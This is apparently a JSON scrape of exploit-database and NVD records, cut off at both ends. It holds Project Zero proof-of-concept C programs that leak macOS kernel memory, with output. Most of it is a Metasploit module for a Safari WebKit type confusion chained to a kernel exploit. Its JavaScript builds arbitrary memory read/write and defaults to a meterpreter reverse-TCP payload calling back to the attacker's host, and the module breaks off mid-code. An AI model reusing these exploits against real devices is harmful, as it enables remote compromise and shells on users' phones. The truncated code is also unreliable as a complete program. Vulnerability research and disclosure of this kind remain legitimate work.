retsize));\r\n}\r\n\r\n`munge_user64_rusage()` performs the conversion by copying individual fields:\r\n\r\n__private_extern__ void \r\nmunge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)\r\n{\r\n /* timeval changes size, so utime and 
stime need special handling */\r\n a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;\r\n a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;\r\n a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;\r\n a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;\r\n[...]\r\n}\r\n\r\n`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:\r\n\r\n#define _STRUCT_USER64_TIMEVAL struct user64_timeval\r\n_STRUCT_USER64_TIMEVAL\r\n{\r\n user64_time_t tv_sec; /* seconds */\r\n __int32_t tv_usec; /* and microseconds */\r\n};\r\n\r\nstruct user64_rusage {\r\n struct user64_timeval ru_utime; /* user time used */\r\n struct user64_timeval ru_stime; /* system time used */\r\n user64_long_t ru_maxrss; /* max resident set size */\r\n[...]\r\n};\r\n\r\nThis padding is not initialized, but is copied to userspace.\r\n\r\n\r\nThe following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.\r\n\r\n\r\nJust leaking stack data from a previous syscall seems to mostly return the upper halves of some kernel pointers.\r\nThe returned data seems to come from the previous syscall:\r\n\r\n$ cat test.c\r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak1, ((char*)&ru)+28, 4);\r\n printf(\"leak1: 0x%08x\\n\", leak1);\r\n printf(\"leak2: 0x%08x\\n\", leak2);\r\n}\r\n\r\nint main(void) {\r\n do_leak();\r\n do_leak();\r\n do_leak();\r\n int fd = open(\"/dev/null\", O_RDONLY);\r\n do_leak();\r\n int dummy;\r\n read(fd, &dummy, 4);\r\n do_leak();\r\n return 0;\r\n}\r\n$ gcc -o test test.c && ./test\r\nleak1: 0x00000000\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 
0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff81\r\nleak2: 0x00000000\r\n\r\n\r\nHowever, I believe that this can also be used to disclose kernel heap memory.\r\nWhen the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack\r\nwithout zeroing it, so the new stack contains data from previous heap allocations.\r\nThe following testcase, when run after repeatedly reading a wordlist into memory,\r\nleaks some non-pointer data that seems to come from the wordlist:\r\n\r\n$ cat forktest.c \r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak1, ((char*)&ru)+28, 4);\r\n char str[1000];\r\n if (leak1 != 0) {\r\n sprintf(str, \"leak1: 0x%08x\\n\", leak1);\r\n write(1, str, strlen(str));\r\n }\r\n if (leak2 != 0) {\r\n sprintf(str, \"leak2: 0x%08x\\n\", leak2);\r\n write(1, str, strlen(str));\r\n }\r\n}\r\n\r\nvoid leak_in_child(void) {\r\n int res_pid, res2;\r\n asm volatile(\r\n \"mov $0x02000002, %%rax\\n\\t\"\r\n \"syscall\\n\\t\"\r\n : \"=a\"(res_pid), \"=d\"(res2)\r\n :\r\n : \"cc\", \"memory\", \"rcx\", \"r11\"\r\n );\r\n //write(1, \"postfork\\n\", 9);\r\n if (res2 == 1) {\r\n //write(1, \"child\\n\", 6);\r\n do_leak();\r\n char dummy;\r\n read(0, &dummy, 1);\r\n asm volatile(\r\n \"mov $0x02000001, %rax\\n\\t\"\r\n \"mov $0, %rdi\\n\\t\"\r\n \"syscall\\n\\t\"\r\n );\r\n }\r\n //printf(\"fork=%d:%d\\n\", res_pid, res2);\r\n int wait_res;\r\n //wait(&wait_res);\r\n}\r\n\r\nint main(void) {\r\n for(int i=0; i<1000; i++) {\r\n leak_in_child();\r\n }\r\n}\r\n$ gcc -o forktest forktest.c && ./forktest\r\nleak1: 0x1b3b1320\r\nleak1: 0x00007f00\r\nleak1: 0x65686375\r\nleak1: 
0x410a2d63\r\nleak1: 0x8162ced5\r\nleak1: 0x65736168\r\nleak1: 0x0000042b\r\n\r\nThe leaked values include the strings \"uche\", \"c-\\nA\" and \"hase\", which could plausibly come from the wordlist.\r\n\r\n\r\nApart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack.\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\nFound by: jannh\r\n\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29199", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-06T09:21:57", "description": "Exploit for multiple platform in category dos / poc", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "zdt", "title": "macOS / iOS - Kernel Double Free due to Incorrect API Usage in Flow Divert Socket Option Handling", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13867"], "modified": "2017-12-12T00:00:00", "id": "1337DAY-ID-29200", "href": "https://0day.today/exploit/description/29200", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1373 \r\n \r\n SO_FLOW_DIVERT_TOKEN is a socket option on the SOL_SOCKET layer. It's implemented by \r\n \r\n flow_divert_token_set(struct socket *so, struct sockopt *sopt) \r\n \r\n in flow_divert.c. \r\n \r\n The relevant code is: \r\n \r\n error = soopt_getm(sopt, &token); \r\n if (error) { \r\n goto done; \r\n } \r\n \r\n error = soopt_mcopyin(sopt, token); \r\n if (error) { \r\n goto done; \r\n } \r\n \r\n ... 
 \r\n \r\n done: \r\n if (token != NULL) { \r\n mbuf_freem(token); \r\n } \r\n \r\n soopt_getm allocates an mbuf. \r\n \r\n soopt_mcopyin, which should copyin the data for the mbuf from userspace, has the following code: \r\n \r\n error = copyin(sopt->sopt_val, mtod(m, char *), \r\n m->m_len); \r\n if (error != 0) { \r\n m_freem(m0); \r\n return (error); \r\n } \r\n \r\n This means that if the copyin fails, by for example providing an invalid userspace pointer, soopt_mcopyin \r\n will free the mbuf. flow_divert_token_set isn't aware of these semantics and if it sees that soopt_mcopyin \r\n returns an error it also calls mbuf_freem on that same mbuf which soopt_mcopyin already freed. \r\n \r\n mbufs are aggressively cached but with sufficiently full caches m_freem will eventually fall through to freeing \r\n back to a zalloc zone, and that zone could potentially be garbage collected leading to the ability to actually \r\n exploit such an issue. \r\n \r\n This PoC will just hit a panic inside m_free when it detects a double-free but do note that this cannot detect \r\n all double frees and this issue is still exploitable with sufficient grooming/cache manipulation. \r\n \r\n Tested on MacOS 10.13 (17A365) on MacBookAir5,2 \r\n */ \r\n \r\n // ianbeer\n\n# 0day.today [2018-01-06] #", "sourceHref": "https://0day.today/exploit/29200", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T19:58:35", "description": "Exploit for macOS platform in category dos / poc", "cvss3": {}, "published": "2018-01-12T00:00:00", "type": "zdt", "title": "macOS - process_policy Stack Leak Through Uninitialized Field Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7154"], "modified": "2018-01-12T00:00:00", "id": "1337DAY-ID-29460", "href": "https://0day.today/exploit/description/29460", "sourceData": "/*\r\nThe syscall\r\nprocess_policy(scope=PROC_POLICY_SCOPE_PROCESS, action=PROC_POLICY_ACTION_GET, policy=PROC_POLICY_RESOURCE_USAGE, policy_subtype=PROC_POLICY_RUSAGE_CPU, attrp=<userbuf>, target_pid=0, target_threadid=<ignored>)\r\ncauses 4 bytes of uninitialized kernel stack memory to be written to userspace.\r\n \r\nThe call graph looks as follows:\r\n \r\nprocess_policy\r\n handle_cpuuse\r\n proc_get_task_ruse_cpu\r\n task_get_cpuusage\r\n [writes scope=1/2/4/0]\r\n [always returns zero]\r\n [writes policyp if scope!=0]\r\n [always returns zero]\r\n copyout\r\n \r\n \r\nIf task_get_cpuusage() set `*scope=0` because none of the flags\r\nTASK_RUSECPU_FLAGS_PERTHR_LIMIT, TASK_RUSECPU_FLAGS_PROC_LIMIT and TASK_RUSECPU_FLAGS_DEADLINE are set in task->rusage_cpu_flags,\r\nproc_get_task_ruse_cpu() does not write anything into `*policyp`, meaning that `cpuattr.ppattr_cpu_attr` in\r\nhandle_cpuuse() remains uninitialized. 
task_get_cpuusage() and proc_get_task_ruse_cpu() always return zero,\r\nso handle_cpuuse() will copy `cpuattr`, including the uninitialized `ppattr_cpu_attr` field, to userspace.\r\n \r\n \r\nTested on a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0:\r\n \r\n$ cat test.c\r\n*/\r\n \r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <inttypes.h>\r\n \r\nstruct proc_policy_cpuusage_attr {\r\n uint32_t ppattr_cpu_attr;\r\n uint32_t ppattr_cpu_percentage;\r\n uint64_t ppattr_cpu_attr_interval;\r\n uint64_t ppattr_cpu_attr_deadline;\r\n};\r\n \r\nvoid run(void) {\r\n int retval;\r\n struct proc_policy_cpuusage_attr attrs = {0,0,0,0};\r\n asm volatile(\r\n \"mov $0x02000143, %%rax\\n\\t\" // process_policy\r\n \"mov $1, %%rdi\\n\\t\" // PROC_POLICY_SCOPE_PROCESS\r\n \"mov $11, %%rsi\\n\\t\" // PROC_POLICY_ACTION_GET\r\n \"mov $4, %%rdx\\n\\t\" // PROC_POLICY_RESOURCE_USAGE\r\n \"mov $3, %%r10\\n\\t\" // PROC_POLICY_RUSAGE_CPU\r\n \"mov %[userptr], %%r8\\n\\t\"\r\n \"mov $0, %%r9\\n\\t\" // PID 0 (self)\r\n // target_threadid is unused\r\n \"syscall\\n\\t\"\r\n : //out\r\n \"=a\"(retval)\r\n : //in\r\n [userptr] \"r\"(&attrs)\r\n : //clobber\r\n \"cc\", \"memory\", \"rdi\", \"rsi\", \"rdx\", \"r10\", \"r8\", \"r9\"\r\n );\r\n printf(\"retval = %d\\n\", retval);\r\n printf(\"ppattr_cpu_attr = 0x%\"PRIx32\"\\n\", attrs.ppattr_cpu_attr);\r\n printf(\"ppattr_cpu_percentage = 0x%\"PRIx32\"\\n\", attrs.ppattr_cpu_percentage);\r\n printf(\"ppattr_cpu_attr_interval = 0x%\"PRIx64\"\\n\", attrs.ppattr_cpu_attr_interval);\r\n printf(\"ppattr_cpu_attr_deadline = 0x%\"PRIx64\"\\n\", attrs.ppattr_cpu_attr_deadline);\r\n}\r\n \r\nint main(void) {\r\n run();\r\n return 0;\r\n}\r\n \r\n/*\r\n$ gcc -Wall -o test test.c\r\n$ ./test\r\nretval = 0\r\nppattr_cpu_attr = 0x1a180ccb\r\nppattr_cpu_percentage = 0x0\r\nppattr_cpu_attr_interval = 0x0\r\nppattr_cpu_attr_deadline = 0x0\r\n \r\nThat looks like the lower half of a pointer or so.\r\n*/\n\n# 0day.today [2018-04-09] #", 
"sourceHref": "https://0day.today/exploit/29460", "cvss": {"score": 5.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}}, {"lastseen": "2021-12-26T09:26:20", "description": "This Metasploit module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The type confusion leads to the ability to allocate fake Javascript objects, as well as the ability to find the address in memory of a Javascript object. This allows us to construct a fake JSCell object that can be used to read and write arbitrary memory from Javascript. The module then uses a ROP chain to write the first stage shellcode into executable memory within the Safari process and kick off its execution. The first stage maps the second stage macho (containing CVE-2017-13861) into executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake exploit leads to a kernel task port (TFP0) that can read and write arbitrary kernel memory. 
The processes credential and sandbox structure in the kernel is overwritten and the meterpreter payloads code signature hash is added to the kernels trust cache, allowing Safari to load and execute the (self-signed) meterpreter payload.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-03T00:00:00", "type": "zdt", "title": "Safari Webkit Proxy Object Type Confusion Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4233", "CVE-2017-13861"], "modified": "2019-06-03T00:00:00", "id": "1337DAY-ID-32828", "href": "https://0day.today/exploit/description/32828", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari Webkit Proxy Object Type Confusion',\n 'Description' => %q{\n This module exploits a type confusion bug in the Javascript Proxy object in\n WebKit. 
The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The type confusion leads to the ability to allocate fake Javascript objects,\n as well as the ability to find the address in memory of a Javascript object.\n This allows us to construct a fake JSCell object that can be used to read\n and write arbitrary memory from Javascript. The module then uses a ROP chain\n to write the first stage shellcode into executable memory within the Safari\n process and kick off its execution.\n\n The first stage maps the second stage macho (containing CVE-2017-13861) into\n executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake\n exploit leads to a kernel task port (TFP0) that can read and write arbitrary\n kernel memory. The processes credential and sandbox structure in the kernel\n is overwritten and the meterpreter payloads code signature hash is added to\n the kernels trust cache, allowing Safari to load and execute the (self-signed)\n meterpreter payload.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo',\n 'niklasb',\n 'Ian Beer',\n 'siguza',\n ],\n 'References' => [\n ['CVE', '2018-4233'],\n ['CVE', '2017-13861'],\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\n ['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'],\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'],\n ['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'],\n ],\n 'Arch' => ARCH_AARCH64,\n 'Platform' => 'apple_ios',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },\n 'Targets' => [[ 'Automatic', {} ]],\n 'DisclosureDate' => 'Mar 15 2018'))\n register_advanced_options([\n 
OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\n OptBool.new('DUMP_OFFSETS', [false, \"Show newly found offsets in a javascript prompt\", false]),\n ])\n end\n\n def exploit_data(directory, file)\n path = ::File.join Msf::Config.data_directory, 'exploits', directory, file\n ::File.binread path\n end\n\n def payload_url\n \"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\"\n end\n\n def get_version(user_agent)\n if user_agent =~ /OS (.*?) like Mac OS X\\)/\n ios_version = Gem::Version.new($1.gsub(\"_\", \".\"))\n return ios_version\n end\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n def on_request_uri(cli, request)\n if request.uri =~ %r{/apple-touch-icon*}\n return\n elsif request.uri =~ %r{/favicon*}\n return\n elsif request.uri =~ %r{/payload10$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha1 iOS 10 payload\")\n return\n elsif request.uri =~ %r{/payload11$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha256 iOS 11 payload\")\n return\n end\n\n user_agent = request['User-Agent']\n print_status(\"Requesting #{request.uri} from #{user_agent}\")\n version = get_version(user_agent)\n ios_11 = (version >= Gem::Version.new('11.0.0'))\n if request.uri =~ %r{/exploit$}\n loader_data = exploit_data('CVE-2017-13861', 'exploit')\n srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)\n config = [srvhost, srvport].pack(\"Nn\") + payload_url\n payload_url_index = loader_data.index('PAYLOAD_URL')\n loader_data[payload_url_index, config.length] = config\n print_good(\"Sent async_wake exploit\")\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\n return\n end\n\n 
get_mem_rw_ios_10 = %Q^\nfunction get_mem_rw(stage1) {\n var structs = [];\n function sprayStructures() {\n function randomString() {\n return Math.random().toString(36).replace(/[\\^a-z]+/g, \"\").substr(0, 5)\n }\n for (var i = 0; i < 4096; i++) {\n var a = new Float64Array(1);\n a[randomString()] = 1337;\n structs.push(a)\n }\n }\n sprayStructures();\n var hax = new Uint8Array(4096);\n var jsCellHeader = new Int64([0, 16, 0, 0, 0, 39, 24, 1]);\n var container = {\n jsCellHeader: jsCellHeader.asJSValue(),\n butterfly: false,\n vector: hax,\n lengthAndFlags: (new Int64(\"0x0001000000000010\")).asJSValue()\n };\n var address = Add(stage1.addrof(container), 16);\n var fakearray = stage1.fakeobj(address);\n while (!(fakearray instanceof Float64Array)) {\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\n container.jsCellHeader = jsCellHeader.asJSValue()\n }\n memory = {\n read: function(addr, length) {\n fakearray[2] = i2f(addr);\n var a = new Array(length);\n for (var i = 0; i < length; i++) a[i] = hax[i];\n return a\n },\n readInt64: function(addr) {\n return new Int64(this.read(addr, 8))\n },\n write: function(addr, data) {\n fakearray[2] = i2f(addr);\n for (var i = 0; i < data.length; i++) hax[i] = data[i]\n },\n writeInt64: function(addr, val) {\n return this.write(addr, val.bytes())\n },\n };\n var empty = {};\n var header = memory.read(stage1.addrof(empty), 8);\n memory.write(stage1.addrof(container), header);\n var f64array = new Float64Array(8);\n header = memory.read(stage1.addrof(f64array), 16);\n memory.write(stage1.addrof(fakearray), header);\n memory.write(Add(stage1.addrof(fakearray), 24), [16, 0, 0, 0, 1, 0, 0, 0]);\n fakearray.container = container;\n return memory;\n}\n^\n\n get_mem_rw_ios_11 = %Q^\nfunction get_mem_rw(stage1) {\n var FPO = typeof(SharedArrayBuffer) === 'undefined' ? 
0x18 : 0x10;\n var structure_spray = []\n for (var i = 0; i < 1000; ++i) {\n var ary = {a:1,b:2,c:3,d:4,e:5,f:6,g:0xfffffff}\n ary['prop'+i] = 1\n structure_spray.push(ary)\n }\n var manager = structure_spray[500]\n var leak_addr = stage1.addrof(manager)\n //print('leaking from: '+ hex(leak_addr))\n function alloc_above_manager(expr) {\n var res\n do {\n for (var i = 0; i < ALLOCS; ++i) {\n structure_spray.push(eval(expr))\n }\n res = eval(expr)\n } while (stage1.addrof(res) < leak_addr)\n return res\n }\n var unboxed_size = 100\n var unboxed = alloc_above_manager('[' + '13.37,'.repeat(unboxed_size) + ']')\n var boxed = alloc_above_manager('[{}]')\n var victim = alloc_above_manager('[]')\n // Will be stored out-of-line at butterfly - 0x10\n victim.p0 = 0x1337\n function victim_write(val) {\n victim.p0 = val\n }\n function victim_read() {\n return victim.p0\n }\n i32[0] = 0x200 // Structure ID\n i32[1] = 0x01082007 - 0x10000 // Fake JSCell metadata, adjusted for boxing\n var outer = {\n p0: 0, // Padding, so that the rest of inline properties are 16-byte aligned\n p1: f64[0],\n p2: manager,\n p3: 0xfffffff, // Butterfly indexing mask\n }\n var fake_addr = stage1.addrof(outer) + FPO + 0x8;\n //print('fake obj @ ' + hex(fake_addr))\n var unboxed_addr = stage1.addrof(unboxed)\n var boxed_addr = stage1.addrof(boxed)\n var victim_addr = stage1.addrof(victim)\n //print('leak ' + hex(leak_addr)\n //+ ' unboxed ' + hex(unboxed_addr)\n //+ ' boxed ' + hex(boxed_addr)\n //+ ' victim ' + hex(victim_addr))\n var holder = {fake: {}}\n holder.fake = stage1.fakeobj(fake_addr)\n // From here on GC would be uncool\n // Share a butterfly for easier boxing/unboxing\n var shared_butterfly = f2i(holder.fake[(unboxed_addr + 8 - leak_addr) / 8])\n var boxed_butterfly = holder.fake[(boxed_addr + 8 - leak_addr) / 8]\n holder.fake[(boxed_addr + 8 - leak_addr) / 8] = i2f(shared_butterfly)\n var victim_butterfly = holder.fake[(victim_addr + 8 - leak_addr) / 8]\n function set_victim_addr(where) 
{\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = i2f(where + 0x10)\n }\n function reset_victim_addr() {\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = victim_butterfly\n }\n var stage2 = {\n addrof: function(victim) {\n boxed[0] = victim\n return f2i(unboxed[0])\n },\n fakeobj: function(addr) {\n unboxed[0] = i2f(addr)\n return boxed[0]\n },\n write64: function(where, what) {\n set_victim_addr(where)\n victim_write(this.fakeobj(what))\n reset_victim_addr()\n },\n read64: function(where) {\n set_victim_addr(where)\n var res = this.addrof(victim_read())\n reset_victim_addr()\n return res;\n },\n write_non_zero: function(where, values) {\n for (var i = 0; i < values.length; ++i) {\n if (values[i] != 0)\n this.write64(where + i*8, values[i])\n }\n },\n readInt64: function(where) {\n if (where instanceof Int64) {\n where = Add(where, 0x10);\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = where.asDouble();\n } else {\n set_victim_addr(where);\n }\n boxed[0] = victim_read();\n var res = f2i(unboxed[0]);\n reset_victim_addr();\n return new Int64(res);\n },\n read: function(addr, length) {\n var address = new Int64(addr);\n var a = new Array(length);\n var i;\n\n for (i = 0; i + 8 < length; i += 8) {\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = 0; j < 8; j++) {\n a[i+j] = v[j];\n }\n }\n\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = i; j < length; j++) {\n a[j] = v[j - i];\n }\n\n return a\n },\n test: function() {\n this.write64(boxed_addr + 0x10, 0xfff) // Overwrite index mask, no biggie\n if (0xfff != this.read64(boxed_addr + 0x10)) {\n fail(2)\n }\n },\n }\n // Test read/write\n stage2.test()\n return stage2;\n}\n^\n\n get_mem_rw = (version >= Gem::Version.new('11.2.2')) ? 
get_mem_rw_ios_11 : get_mem_rw_ios_10\n utils = exploit_data \"CVE-2018-4233\", \"utils.js\"\n int64 = exploit_data \"CVE-2018-4233\", \"int64.js\"\n dump_offsets = ''\n if datastore['DUMP_OFFSETS']\n dump_offsets = %Q^\n var offsetstr = uuid + \" : { \";\n var offsetarray = [ \"_dlsym\", \"_dlopen\", \"__longjmp\", \"regloader\", \"dispatch\", \"stackloader\", \"movx4\", \"ldrx8\", \"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\", \"__platform_memmove\",\n \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\", \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\", \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\", ];\n for (var i = 0; i < offsetarray.length; i++) {\n var offset = offsets[offsetarray[i]];\n if (offset) {\n var offsethex = Sub(offset, cache_slide).toString().replace(\"0x0000000\", \"0x\");\n offsetstr += \"\\\\\"\" + offsetarray[i] + \"\\\\\" : \" + offsethex + \", \";\n }\n }\n offsetstr += \"}, \";\n prompt(\"offsets: \", offsetstr);\n^\n end\n\n html = %Q^\n<html>\n<body>\n<script>\n\n#{utils}\n#{int64}\n\nprint = alert;\nITERS = 1E4;\nALLOCS = 1E3;\n\nvar conversion_buffer = new ArrayBuffer(8);\nvar f64 = new Float64Array(conversion_buffer);\nvar i32 = new Uint32Array(conversion_buffer);\nvar BASE32 = 0x100000000;\n\nfunction f2i(f) {\n f64[0] = f;\n return i32[0] + BASE32 * i32[1];\n}\n\nfunction i2f(i) {\n i32[0] = i % BASE32;\n i32[1] = i / BASE32;\n return f64[0];\n}\n\nfunction hexit(x) {\n if (x instanceof Int64) return x.toString();\n if (x < 0) return \"-\" + hex(-x);\n return \"0x\" + x.toString(16);\n}\n\nfunction fail(x) {\n print('FAIL ' + x);\n location.reload();\n throw null;\n}\n\ncounter = 0;\n\n// CVE-2018-4233\nfunction trigger(constr, modify, res, val) {\n return eval(`\n var o = [13.37]\n var Constructor${counter} = function(o) { ${constr} }\n var hack = false\n var Wrapper = new Proxy(Constructor${counter}, {\n get: function() {\n if (hack) {\n ${modify}\n }\n }\n })\n for (var i = 0; i < ITERS; ++i)\n new Wrapper(o)\n hack = true\n 
var bar = new Wrapper(o)\n ${res}\n `)\n}\n\nvar workbuf = new ArrayBuffer(0x1000000);\nvar payload = new Uint8Array(workbuf);\n\nfunction pwn() {\n var stage1 = {\n addrof: function(victim) {\n return f2i(trigger(\"this.result = o[0]\", \"o[0] = val\", \"bar.result\", victim))\n },\n fakeobj: function(addr) {\n return trigger(\"o[0] = val\", \"o[0] = {}\", \"o[0]\", i2f(addr))\n },\n test: function() {\n var addr = this.addrof({\n a: 4919\n });\n var x = this.fakeobj(addr);\n if (x.a != 4919) fail(\"stage1\")\n }\n };\n stage1.test();\n\n var stage2 = get_mem_rw(stage1);\n var FPO = #{ios_11 ? \"(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;\" : \"0x18;\"}\n var memory = stage2;\n memory.u32 = _u32;\n\n var wrapper = document.createElement(\"div\");\n var wrapper_addr = stage1.addrof(wrapper);\n var el_addr = memory.readInt64(wrapper_addr + FPO);\n var vtab = memory.readInt64(el_addr);\n\n var anchor = memory.readInt64(vtab);\n var hdr = Sub(anchor, anchor.lo() & 0xfff);\n var b = [];\n while(true)\n {\n if (memory.readInt64(hdr).lo() == 4277009104) {\n fail('WebCore ' + hdr + ' post spectre support coming soon');\n }\n if(strcmp(memory.read(hdr, 0x10), \"dyld_v1 arm64\"))\n {\n break;\n }\n hdr = Sub(hdr, 0x1000);\n }\n\n var base_seg = null;\n var nsegs = memory.u32(Add(hdr, 0x14));\n var segdata = memory.read(Add(hdr, memory.u32(Add(hdr, 0x10))), nsegs * 0x20);\n var segs = [];\n for(var i = 0; i < nsegs; ++i)\n {\n var off = i * 0x20;\n var seg =\n {\n addr: new Int64(segdata.slice(off + 0x0, off + 0x8)),\n size: new Int64(segdata.slice(off + 0x8, off + 0x10)),\n fileoff: new Int64(segdata.slice(off + 0x10, off + 0x18)),\n maxprot: b2u32(segdata.slice(off + 0x18, off + 0x1c)),\n initprot: b2u32(segdata.slice(off + 0x1c, off + 0x20))\n };\n segs.push(seg);\n if(seg.fileoff.hi() == 0 && seg.fileoff.lo() == 0 && (seg.size.hi() != 0 || seg.size.lo() != 0))\n {\n base_seg = seg;\n }\n }\n if(base_seg == null)\n {\n fail(\"base_seg\");\n }\n\n var 
This issue affected versions prior to iOS 11.2, macOS High Sierra 10.13.2, tvOS 11.2, watchOS 4.2, iTunes 12.7.2 for Windows, macOS High Sierra 10.13.4.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-03T18:29:00", "type": "cve", "title": "CVE-2017-7151", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 